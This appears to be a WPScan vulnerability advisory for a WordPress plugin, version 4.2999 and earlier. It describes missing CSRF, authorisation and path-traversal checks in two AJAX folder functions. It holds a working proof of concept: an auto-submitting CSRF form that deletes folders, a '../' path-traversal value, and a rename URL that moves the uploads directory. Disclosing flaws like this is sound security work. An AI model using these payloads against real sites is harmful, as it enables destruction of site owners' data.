Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename



Description
The lack of CSRF, Authorisation and Path Traversal checks in wp_ajax_del_dir() and wp_ajax_rename_dir() AJAX methods in functions.php make it possible for an authenticated user with a role as low as subscriber to delete and rename arbitrary folders. CSRF attacks against such authenticated users is also possible, in order to make them perform those malicious actions.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="del_dir" />
      <input type="hidden" name="dir" value="" />
    </form>
  </body>
</html>

The dir parameter can be changed, for example using '../' will delete the content of wp-content/uploads.

To rename and move wp-content/uploads/articulate_uploads to wp-content/yolo:

https://<BLOG>/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset?old=2114846&old_path=insert-or-embed-articulate-content-into-wordpress%2Ftrunk%2Ffunctions.php&new=2115820&new_path=insert-or-embed-articulate-content-into-wordpress%2Ftrunk%2Ffunctions.php

Classification

Type MULTI

Miscellaneous

Original Researcher WPScanTeam
Submitter WPScanTeam
Submitter Website https://wpscan.org
Submitter Twitter _WPScan_
Views 1101
Verified Yes
WPVDB ID 9416

Timeline

Publicly Published 2019-07-02 (22 days ago)
Added 2019-07-02 (21 days ago)
Last Updated 2019-07-16 (7 days ago)